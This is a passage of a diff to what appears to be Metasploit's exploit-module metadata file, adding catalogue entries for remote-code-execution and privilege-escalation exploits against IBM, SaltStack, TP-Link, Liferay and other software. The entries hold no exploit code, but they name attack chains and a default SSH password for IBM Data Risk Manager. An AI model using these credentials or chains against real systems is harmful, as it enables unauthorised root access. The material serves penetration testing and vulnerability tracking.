+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2020-04-21",
+    "type": "exploit",
+    "author": [
+      "Pedro Ribeiro <pedrib@gmail.com>"
+    ],
+    "description": "IBM Data Risk Manager (IDRM) contains three vulnerabilities that can be chained by\n          an unauthenticated attacker to achieve remote code execution as root.\n          The first is an unauthenticated bypass, followed by a command injection as the server user,\n          and finally abuse of an insecure default password.\n          This module exploits all three vulnerabilities, giving the attacker a root shell.\n          At the time of disclosure, this is a 0day. Versions 2.0.3 and below are confirmed to be\n          affected, and the latest 2.0.6 is most likely affected too.",
+    "references": [
+      "CVE-2020-4427",
+      "CVE-2020-4428",
+      "CVE-2020-4429",
+      "URL-https://github.com/pedrib/PoC/blob/master/advisories/IBM/ibm_drm/ibm_drm_rce.md",
+      "URL-https://seclists.org/fulldisclosure/2020/Apr/33"
+    ],
+    "platform": "Linux",
+    "arch": "x86, x64",
+    "rport": 8443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "IBM Data Risk Manager <= 2.0.3 (<= 2.0.6 possibly affected)"
+    ],
+    "mod_time": "2020-05-05 10:54:33 +0000",
+    "path": "/modules/exploits/linux/http/ibm_drm_rce.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/ibm_drm_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
   "exploit_linux/http/ibm_qradar_unauth_rce": {
     "name": "IBM QRadar SIEM Unauthenticated Remote Code Execution",
     "fullname": "exploit/linux/http/ibm_qradar_unauth_rce",
@@ -54414,7 +54975,7 @@
       "CVE-2018-1418",
       "CVE-2018-1612",
       "URL-https://blogs.securiteam.com/index.php/archives/3689",
-      "URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/ibm-qradar-siem-forensics.txt",
+      "URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/IBM/ibm-qradar-siem-forensics.txt",
       "URL-https://seclists.org/fulldisclosure/2018/May/54",
       "URL-http://www-01.ibm.com/support/docview.wss?uid=swg22015797"
     ],
@@ -54439,7 +55000,7 @@
     "targets": [
       "IBM QRadar SIEM <= 7.3.1 Patch 2 / 7.2.8 Patch 11"
     ],
-    "mod_time": "2018-09-15 18:54:45 +0000",
+    "mod_time": "2020-05-09 14:59:43 +0000",
     "path": "/modules/exploits/linux/http/ibm_qradar_unauth_rce.rb",
     "is_install_path": true,
     "ref_name": "linux/http/ibm_qradar_unauth_rce",
@@ -56257,6 +56818,126 @@
     },
     "needs_cleanup": null
   },
+  "exploit_linux/http/netsweeper_webadmin_unixlogin": {
+    "name": "Netsweeper WebAdmin unixlogin.php Python Code Injection",
+    "fullname": "exploit/linux/http/netsweeper_webadmin_unixlogin",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2020-04-28",
+    "type": "exploit",
+    "author": [
+      "wvu <wvu@metasploit.com>"
+    ],
+    "description": "This module exploits a Python code injection in the Netsweeper\n          WebAdmin component's unixlogin.php script, for versions 6.4.4 and\n          prior, to execute code as the root user.\n\n          Authentication is bypassed by sending a random whitelisted Referer\n          header in each request.\n\n          Tested on the CentOS Linux-based Netsweeper 6.4.3 and 6.4.4 ISOs.\n          Though the advisory lists 6.4.3 and prior as vulnerable, 6.4.4 has\n          been confirmed exploitable.",
+    "references": [
+      "CVE-2020-13167",
+      "URL-https://ssd-disclosure.com/ssd-advisory-netsweeper-preauth-rce/",
+      "URL-https://portswigger.net/daily-swig/severe-rce-vulnerability-in-content-filtering-system-has-been-patched-netsweeper-says"
+    ],
+    "platform": "Python",
+    "arch": "python",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Python"
+    ],
+    "mod_time": "2020-05-22 16:53:44 +0000",
+    "path": "/modules/exploits/linux/http/netsweeper_webadmin_unixlogin.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/netsweeper_webadmin_unixlogin",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "needs_cleanup": null
+  },
+  "exploit_linux/http/nexus_repo_manager_el_injection": {
+    "name": "Nexus Repository Manager Java EL Injection RCE",
+    "fullname": "exploit/linux/http/nexus_repo_manager_el_injection",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2020-03-31",
+    "type": "exploit",
+    "author": [
+      "Alvaro Muñoz",
+      "wvu <wvu@metasploit.com>"
+    ],
+    "description": "This module exploits a Java Expression Language (EL) injection in\n          Nexus Repository Manager versions up to and including 3.21.1 to\n          execute code as the Nexus user.\n\n          This is a post-authentication vulnerability, so credentials are\n          required to exploit the bug. Any user regardless of privilege level\n          may be used.\n\n          Tested against 3.21.1-01.",
+    "references": [
+      "CVE-2020-10199",
+      "URL-https://securitylab.github.com/advisories/GHSL-2020-011-nxrm-sonatype",
+      "URL-https://support.sonatype.com/hc/en-us/articles/360044882533-CVE-2020-10199-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31"
+    ],
+    "platform": "Linux",
+    "arch": "x86, x64",
+    "rport": 8081,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Nexus Repository Manager <= 3.21.1"
+    ],
+    "mod_time": "2020-04-22 10:44:07 +0000",
+    "path": "/modules/exploits/linux/http/nexus_repo_manager_el_injection.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/nexus_repo_manager_el_injection",
+    "check": true,
+    "post_auth": true,
+    "default_credential": true,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "needs_cleanup": null
+  },
   "exploit_linux/http/nginx_chunked_size": {
     "name": "Nginx HTTP Server 1.3.9-1.4.0 Chunked Encoding Stack Buffer Overflow",
     "fullname": "exploit/linux/http/nginx_chunked_size",
@@ -56608,6 +57289,54 @@
     },
     "needs_cleanup": true
   },
+  "exploit_linux/http/pandora_ping_cmd_exec": {
+    "name": "Pandora FMS Ping Authenticated Remote Code Execution",
+    "fullname": "exploit/linux/http/pandora_ping_cmd_exec",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2020-03-09",
+    "type": "exploit",
+    "author": [
+      "Onur ER <onur@onurer.net>"
+    ],
+    "description": "This module exploits a vulnerability found in Pandora FMS 7.0NG and lower.\n          net_tools.php in Pandora FMS 7.0NG allows remote attackers to execute arbitrary OS commands.",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "x86, x64",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic Target"
+    ],
+    "mod_time": "2020-04-16 02:04:17 +0000",
+    "path": "/modules/exploits/linux/http/pandora_ping_cmd_exec.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/pandora_ping_cmd_exec",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
   "exploit_linux/http/panos_readsessionvars": {
     "name": "Palo Alto Networks readSessionVarsFromFile() Session Corruption",
     "fullname": "exploit/linux/http/panos_readsessionvars",
@@ -57106,7 +57835,7 @@
       "Unix In-Memory",
       "Linux Dropper"
     ],
-    "mod_time": "2019-12-03 10:39:58 +0000",
+    "mod_time": "2020-04-20 20:06:52 +0000",
     "path": "/modules/exploits/linux/http/pulse_secure_cmd_exec.rb",
     "is_install_path": true,
     "ref_name": "linux/http/pulse_secure_cmd_exec",
@@ -58227,6 +58956,58 @@
     },
     "needs_cleanup": null
   },
+  "exploit_linux/http/synology_dsm_smart_exec_auth": {
+    "name": "Synology DiskStation Manager smart.cgi Remote Command Execution",
+    "fullname": "exploit/linux/http/synology_dsm_smart_exec_auth",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2017-11-08",
+    "type": "exploit",
+    "author": [
+      "Nigusu Kassahun",
+      "h00die"
+    ],
+    "description": "This module exploits a vulnerability found in Synology DiskStation Manager (DSM)\n          versions < 5.2-5967-5, which allows the execution of arbitrary commands under root\n          privileges after website authentication.\n          The vulnerability is located in webman/modules/StorageManager/smart.cgi, which\n          allows appending of a command to the device to be scanned.  However, the command\n          with drive is limited to 30 characters.  A somewhat valid drive name is required,\n          thus /dev/sd is used, even though it doesn't exist.  To circumvent the character\n          restriction, a wget input file is staged in /a, and executed to download our payload\n          to /b.  From there the payload is executed.  A wfsdelay is required to give time\n          for the payload to download, and the execution of it to run.",
+    "references": [
+      "CVE-2017-15889",
+      "EDB-43190",
+      "URL-https://ssd-disclosure.com/ssd-advisory-synology-storagemanager-smart-cgi-remote-command-execution/",
+      "URL-https://synology.com/en-global/security/advisory/Synology_SA_17_65_DSM"
+    ],
+    "platform": "Python",
+    "arch": "python",
+    "rport": 5000,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2020-05-21 17:39:54 +0000",
+    "path": "/modules/exploits/linux/http/synology_dsm_smart_exec_auth.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/synology_dsm_smart_exec_auth",
+    "check": true,
+    "post_auth": true,
+    "default_credential": true,
+    "notes": {
+    },
+    "needs_cleanup": true
+  },
   "exploit_linux/http/tiki_calendar_exec": {
     "name": "Tiki-Wiki CMS Calendar Command Execution",
     "fullname": "exploit/linux/http/tiki_calendar_exec",
@@ -58794,6 +59575,57 @@
     },
     "needs_cleanup": null
   },
+  "exploit_linux/http/unraid_auth_bypass_exec": {
+    "name": "Unraid 6.8.0 Auth Bypass PHP Code Execution",
+    "fullname": "exploit/linux/http/unraid_auth_bypass_exec",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2020-02-10",
+    "type": "exploit",
+    "author": [
+      "Nicolas CHATELAIN <n.chatelain@sysdream.com>"
+    ],
+    "description": "This module exploits two vulnerabilities affecting Unraid 6.8.0.\n          An authentication bypass is used to gain access to the administrative\n          interface, and an insecure use of the extract PHP function can be abused\n          for arbitrary code execution as root.",
+    "references": [
+      "CVE-2020-5847",
+      "CVE-2020-5849",
+      "URL-https://sysdream.com/news/lab/2020-02-06-cve-2020-5847-cve-2020-5849-unraid-6-8-0-unauthenticated-remote-code-execution-as-root/",
+      "URL-https://forums.unraid.net/topic/88253-critical-security-vulnerabilies-discovered/"
+    ],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2020-04-16 17:17:02 +0000",
+    "path": "/modules/exploits/linux/http/unraid_auth_bypass_exec.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/unraid_auth_bypass_exec",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
   "exploit_linux/http/vap2500_tools_command_exec": {
     "name": "Arris VAP2500 tools_command.php Command Execution",
     "fullname": "exploit/linux/http/vap2500_tools_command_exec",
@@ -58901,6 +59733,69 @@
     },
     "needs_cleanup": null
   },
+  "exploit_linux/http/vestacp_exec": {
+    "name": "Vesta Control Panel Authenticated Remote Code Execution",
+    "fullname": "exploit/linux/http/vestacp_exec",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2020-03-17",
+    "type": "exploit",
+    "author": [
+      "Mehmet Ince <mehmet@mehmetince.net>"
+    ],
+    "description": "This module exploits an authenticated command injection vulnerability in the v-list-user-backups\n          bash script file in Vesta Control Panel to gain remote code execution as the root user.",
+    "references": [
+      "URL-https://pentest.blog/vesta-control-panel-second-order-remote-code-execution-0day-step-by-step-analysis/",
+      "CVE-2020-10808"
+    ],
+    "platform": "Python",
+    "arch": "python",
+    "rport": 8083,
+    "autofilter_ports": [
+      21,
+      2121,
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "ftp",
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2020-04-16 02:04:17 +0000",
+    "path": "/modules/exploits/linux/http/vestacp_exec.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/vestacp_exec",
+    "check": false,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "first-attempt-fail"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "config-changes",
+        "artifacts-on-disk"
+      ]
+    },
+    "needs_cleanup": true
+  },
   "exploit_linux/http/wanem_exec": {
     "name": "WAN Emulator v2.3 Command Execution",
     "fullname": "exploit/linux/http/wanem_exec",
@@ -60747,6 +61642,56 @@
     },
     "needs_cleanup": null
   },
+  "exploit_linux/local/hp_xglance_priv_esc": {
+    "name": "HP Performance Monitoring xglance Priv Esc",
+    "fullname": "exploit/linux/local/hp_xglance_priv_esc",
+    "aliases": [
+
+    ],
+    "rank": 500,
+    "disclosure_date": "2014-11-19",
+    "type": "exploit",
+    "author": [
+      "h00die",
+      "Tim Brown",
+      "Robert Jaroszuk",
+      "Marco Ortisi"
+    ],
+    "description": "This exploit takes advantage of xglance-bin, part of\n          HP's Glance (or Performance Monitoring) version 11 'and subsequent'\n          , which was compiled with an insecure RPATH option.  The RPATH includes\n          a relative path to -L/lib64/ which can be controlled by a user.\n          Creating libraries in this location will result in an\n          escalation of privileges to root.",
+    "references": [
+      "EDB-48000",
+      "URL-https://seclists.org/fulldisclosure/2014/Nov/55",
+      "URL-https://www.redtimmy.com/linux-hacking/perf-exploiter/",
+      "URL-https://github.com/redtimmy/perf-exploiter",
+      "PACKETSTORM-156206",
+      "URL-https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2630/",
+      "CVE-2014-2630"
+    ],
+    "platform": "Linux",
+    "arch": "x86, x64",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Automatic",
+      "Linux x86",
+      "Linux x64"
+    ],
+    "mod_time": "2020-04-30 18:53:56 +0000",
+    "path": "/modules/exploits/linux/local/hp_xglance_priv_esc.rb",
+    "is_install_path": true,
+    "ref_name": "linux/local/hp_xglance_priv_esc",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": true
+  },
   "exploit_linux/local/juju_run_agent_priv_esc": {
     "name": "Juju-run Agent Privilege Escalation",
     "fullname": "exploit/linux/local/juju_run_agent_priv_esc",
@@ -63360,6 +64305,64 @@
     },
     "needs_cleanup": null
   },
+  "exploit_linux/misc/saltstack_salt_unauth_rce": {
+    "name": "SaltStack Salt Master/Minion Unauthenticated RCE",
+    "fullname": "exploit/linux/misc/saltstack_salt_unauth_rce",
+    "aliases": [
+
+    ],
+    "rank": 500,
+    "disclosure_date": "2020-04-30",
+    "type": "exploit",
+    "author": [
+      "F-Secure",
+      "wvu <wvu@metasploit.com>"
+    ],
+    "description": "This module exploits unauthenticated access to the runner() and\n          _send_pub() methods in the SaltStack Salt master's ZeroMQ request\n          server, for versions 2019.2.3 and earlier and 3000.1 and earlier, to\n          execute code as root on either the master or on select minions.\n\n          VMware vRealize Operations Manager versions 7.5.0 through 8.1.0 are\n          known to be affected by the Salt vulnerabilities.\n\n          Tested against SaltStack Salt 2019.2.3 and 3000.1 on Ubuntu 18.04, as\n          well as Vulhub's Docker image.",
+    "references": [
+      "CVE-2020-11651",
+      "CVE-2020-11652",
+      "URL-https://labs.f-secure.com/advisories/saltstack-authorization-bypass",
+      "URL-https://community.saltstack.com/blog/critical-vulnerabilities-update-cve-2020-11651-and-cve-2020-11652/",
+      "URL-https://www.vmware.com/security/advisories/VMSA-2020-0009.html",
+      "URL-https://github.com/saltstack/salt/blob/master/tests/integration/master/test_clear_funcs.py"
+    ],
+    "platform": "Python,Unix",
+    "arch": "python, cmd",
+    "rport": 4506,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Master (Python payload)",
+      "Master (Unix command)",
+      "Minions (Python payload)",
+      "Minions (Unix command)"
+    ],
+    "mod_time": "2020-05-21 21:01:52 +0000",
+    "path": "/modules/exploits/linux/misc/saltstack_salt_unauth_rce.rb",
+    "is_install_path": true,
+    "ref_name": "linux/misc/saltstack_salt_unauth_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "service-resource-loss"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "needs_cleanup": true
+  },
   "exploit_linux/misc/sercomm_exec": {
     "name": "SerComm Device Remote Code Execution",
     "fullname": "exploit/linux/misc/sercomm_exec",
@@ -63412,6 +64415,63 @@
     },
     "needs_cleanup": null
   },
+  "exploit_linux/misc/tplink_archer_a7_c7_lan_rce": {
+    "name": "TP-Link Archer A7/C7 Unauthenticated LAN Remote Code Execution",
+    "fullname": "exploit/linux/misc/tplink_archer_a7_c7_lan_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2020-03-25",
+    "type": "exploit",
+    "author": [
+      "Pedro Ribeiro <pedrib@gmail.com>",
+      "Radek Domanski <radek.domanski <Radek Domanski <radek.domanski@gmail.com> @RabbitPro>"
+    ],
+    "description": "This module exploits a command injection vulnerability in the tdpServer daemon (/usr/bin/tdpServer), running on\n          the router TP-Link Archer A7/C7 (AC1750), hardware version 5, MIPS Architecture, firmware version 190726.\n          The vulnerability can only be exploited by an attacker on the LAN side of the router, but the attacker does\n          not need any authentication to abuse it. After exploitation, an attacker will be able to execute any command\n          as root, including downloading and executing a binary from another host.\n          This vulnerability was discovered and exploited at Pwn2Own Tokyo 2019 by the Flashback team (Pedro Ribeiro +\n          Radek Domanski).",
+    "references": [
+      "URL-https://www.thezdi.com/blog/2020/4/6/exploiting-the-tp-link-archer-c7-at-pwn2own-tokyo",
+      "URL-https://github.com/pedrib/PoC/blob/master/advisories/Pwn2Own/Tokyo_2019/lao_bomb/lao_bomb.md",
+      "URL-https://github.com/rdomanski/Exploits_and_Advisories/blob/master/advisories/Pwn2Own/Tokyo2019/lao_bomb.md",
+      "CVE-2020-10882",
+      "CVE-2020-10883",
+      "CVE-2020-10884",
+      "ZDI-20-334",
+      "ZDI-20-335",
+      "ZDI-20-336"
+    ],
+    "platform": "Linux",
+    "arch": "mipsbe",
+    "rport": 20002,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "TP-Link Archer A7/C7 (AC1750) v5 (firmware 190726)"
+    ],
+    "mod_time": "2020-04-16 02:04:17 +0000",
+    "path": "/modules/exploits/linux/misc/tplink_archer_a7_c7_lan_rce.rb",
+    "is_install_path": true,
+    "ref_name": "linux/misc/tplink_archer_a7_c7_lan_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
   "exploit_linux/misc/ueb9_bpserverd": {
     "name": "Unitrends UEB bpserverd authentication bypass RCE",
     "fullname": "exploit/linux/misc/ueb9_bpserverd",
@@ -64499,6 +65559,47 @@
     },
     "needs_cleanup": null
   },
+  "exploit_linux/ssh/ibm_drm_a3user": {
+    "name": "IBM Data Risk Manager a3user Default Password",
+    "fullname": "exploit/linux/ssh/ibm_drm_a3user",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2020-04-21",
+    "type": "exploit",
+    "author": [
+      "Pedro Ribeiro <pedrib@gmail.com>"
+    ],
+    "description": "This module abuses a known default password in IBM Data Risk Manager. The 'a3user'\n          has the default password 'idrm' and allows an attacker to log in to the virtual appliance\n          via SSH. This can be escalate to full root access, as 'a3user' has sudo access with the default password.\n          At the time of disclosure, this is a 0day. Versions <= 2.0.3 are confirmed to be\n          affected, and the latest 2.0.6 is most likely affected too.",
+    "references": [
+      "CVE-2020-4429",
+      "URL-https://github.com/pedrib/PoC/blob/master/advisories/IBM/ibm_drm/ibm_drm_rce.md",
+      "URL-https://seclists.org/fulldisclosure/2020/Apr/33"
+    ],
+    "platform": "Unix",
+    "arch": "cmd",
+    "rport": 22,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "IBM Data Risk Manager <= 2.0.3 (<= 2.0.6 possibly affected)"
+    ],
+    "mod_time": "2020-05-05 10:16:46 +0000",
+    "path": "/modules/exploits/linux/ssh/ibm_drm_a3user.rb",
+    "is_install_path": true,
+    "ref_name": "linux/ssh/ibm_drm_a3user",
+    "check": false,
+    "post_auth": true,
+    "default_credential": true,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
   "exploit_linux/ssh/loadbalancerorg_enterprise_known_privkey": {
     "name": "Loadbalancer.org Enterprise VA SSH Private Key Exposure",
     "fullname": "exploit/linux/ssh/loadbalancerorg_enterprise_known_privkey",
@@ -64917,7 +66018,7 @@
       "Unix In-Memory",
       "Linux Dropper"
     ],
-    "mod_time": "2020-02-19 01:06:50 +0000",
+    "mod_time": "2020-04-12 20:10:17 +0000",
     "path": "/modules/exploits/linux/upnp/belkin_wemo_upnp_exec.rb",
     "is_install_path": true,
     "ref_name": "linux/upnp/belkin_wemo_upnp_exec",
@@ -71135,7 +72236,7 @@
       "Unix In-Memory",
       "Java Dropper"
     ],
-    "mod_time": "2020-02-19 01:06:50 +0000",
+    "mod_time": "2020-04-10 04:09:17 +0000",
     "path": "/modules/exploits/multi/http/jenkins_metaprogramming.rb",
     "is_install_path": true,
     "ref_name": "multi/http/jenkins_metaprogramming",
@@ -71537,6 +72638,69 @@
     },
     "needs_cleanup": null
   },
+  "exploit_multi/http/liferay_java_unmarshalling": {
+    "name": "Liferay Portal Java Unmarshalling via JSONWS RCE",
+    "fullname": "exploit/multi/http/liferay_java_unmarshalling",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2019-11-25",
+    "type": "exploit",
+    "author": [
+      "Markus Wulftange",
+      "Thomas Etrillard",
+      "wvu <wvu@metasploit.com>"
+    ],
+    "description": "This module exploits a Java unmarshalling vulnerability via JSONWS in\n          Liferay Portal versions < 6.2.5 GA6, 7.0.6 GA7, 7.1.3 GA4, and 7.2.1\n          GA2 to execute code as the Liferay user. Tested against 7.2.0 GA1.",
+    "references": [
+      "CVE-2020-7961",
+      "URL-https://codewhitesec.blogspot.com/2020/03/liferay-portal-json-vulns.html",
+      "URL-https://www.synacktiv.com/posts/pentest/how-to-exploit-liferay-cve-2020-7961-quick-journey-to-poc.html",
+      "URL-https://portal.liferay.dev/learn/security/known-vulnerabilities/-/asset_publisher/HbL5mxmVrnXW/content/id/117954271"
+    ],
+    "platform": "Java",
+    "arch": "java",
+    "rport": 8080,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Liferay Portal < 6.2.5 GA6, 7.0.6 GA7, 7.1.3 GA4, 7.2.1 GA2"
+    ],
+    "mod_time": "2020-04-22 10:44:07 +0000",
+    "path": "/modules/exploits/multi/http/liferay_java_unmarshalling.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/liferay_java_unmarshalling",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "needs_cleanup": null
+  },
   "exploit_multi/http/log1cms_ajax_create_folder": {
     "name": "Log1 CMS writeInfo() PHP Code Injection",
     "fullname": "exploit/multi/http/log1cms_ajax_create_folder",
@@ -74655,6 +75819,57 @@
     },
     "needs_cleanup": null
   },
+  "exploit_multi/http/playsms_template_injection": {
+    "name": "PlaySMS index.php Unauthenticated Template Injection Code Execution",
+    "fullname": "exploit/multi/http/playsms_template_injection",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2020-02-05",
+    "type": "exploit",
+    "author": [
+      "Touhid M.Shaikh <touhidshaikh22@gmail.com>",
+      "Lucas Rosevear"
+    ],
+    "description": "This module exploits a preauth Server-Side Template Injection vulnerability that leads to remote code execution\n          in PlaySMS before version 1.4.3. This issue is caused by double processing a server-side template with a custom\n          PHP template system called 'TPL' which is used in the PlaySMS template engine at\n          `src/Playsms/Tpl.php:_compile()`. The vulnerability is triggered when an attacker supplied username with a\n          malicious payload is submitted. This malicious payload is then stored in a TPL template which when rendered a\n          second time, results in code execution.\n          The TPL(https://github.com/antonraharja/tpl) template language is vulnerable to PHP code injection.\n\n          This module was tested against PlaySMS 1.4 on HackTheBox's Forlic Machine.",
+    "references": [
+      "CVE-2020-8644",
+      "URL-https://www.youtube.com/watch?v=zu-bwoAtTrc",
+      "URL-https://research.nccgroup.com/2020/02/11/technical-advisory-playsms-pre-authentication-remote-code-execution-cve-2020-8644/"
+    ],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "PlaySMS Before 1.4.3"
+    ],
+    "mod_time": "2020-04-03 09:51:24 +0000",
+    "path": "/modules/exploits/multi/http/playsms_template_injection.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/playsms_template_injection",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
   "exploit_multi/http/playsms_uploadcsv_exec": {
     "name": "PlaySMS import.php Authenticated CSV File Upload Code Execution",
     "fullname": "exploit/multi/http/playsms_uploadcsv_exec",
@@ -75485,6 +76700,56 @@
     },
     "needs_cleanup": null
   },
+  "exploit_multi/http/shiro_rememberme_v124_deserialize": {
+    "name": "Apache Shiro v1.2.4 Cookie RememberME Deserial RCE",
+    "fullname": "exploit/multi/http/shiro_rememberme_v124_deserialize",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2016-06-07",
+    "type": "exploit",
+    "author": [
+      "L / l-codes <L / l-codes@qq.com>"
+    ],
+    "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable\n        installations of Apache Shiro v1.2.4.",
+    "references": [
+      "CVE-2016-4437",
+      "URL-https://github.com/Medicean/VulApps/tree/master/s/shiro/1"
+    ],
+    "platform": "Unix,Windows",
+    "arch": "cmd",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix Command payload",
+      "Windows Command payload"
+    ],
+    "mod_time": "2020-04-28 14:24:17 +0000",
+    "path": "/modules/exploits/multi/http/shiro_rememberme_v124_deserialize.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/shiro_rememberme_v124_deserialize",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
   "exploit_multi/http/shopware_createinstancefromnamedarguments_rce": {
     "name": "Shopware createInstanceFromNamedArguments PHP Object Instantiation RCE",
     "fullname": "exploit/multi/http/shopware_createinstancefromnamedarguments_rce",
@@ -79522,7 +80787,7 @@
     "references": [
       "CVE-2019-4716",
       "URL-https://www.ibm.com/support/pages/node/1127781",
-      "URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/ibm-tm1-rce.txt",
+      "URL-https://github.com/pedrib/PoC/blob/master/advisories/IBM/ibm_tm1_rce.md",
       "URL-https://seclists.org/fulldisclosure/2020/Mar/44"
     ],
     "platform": "",
@@ -79541,7 +80806,7 @@
       "Linux (Command)",
       "AIX (Command)"
     ],
-    "mod_time": "2020-03-30 12:49:58 +0000",
+    "mod_time": "2020-05-09 14:58:46 +0000",
     "path": "/modules/exploits/multi/misc/ibm_tm1_unauth_rce.rb",
     "is_install_path": true,
     "ref_name": "multi/misc/ibm_tm1_unauth_rce",
@@ -80586,6 +81851,50 @@
     },
     "needs_cleanup": null
   },
+  "exploit_multi/misc/weblogic_deserialize_badattrval": {
+    "name": "WebLogic Server Deserialization RCE - BadAttributeValueExpException",
+    "fullname": "exploit/multi/misc/weblogic_deserialize_badattrval",
+    "aliases": [
+
+    ],
+    "rank": 300,
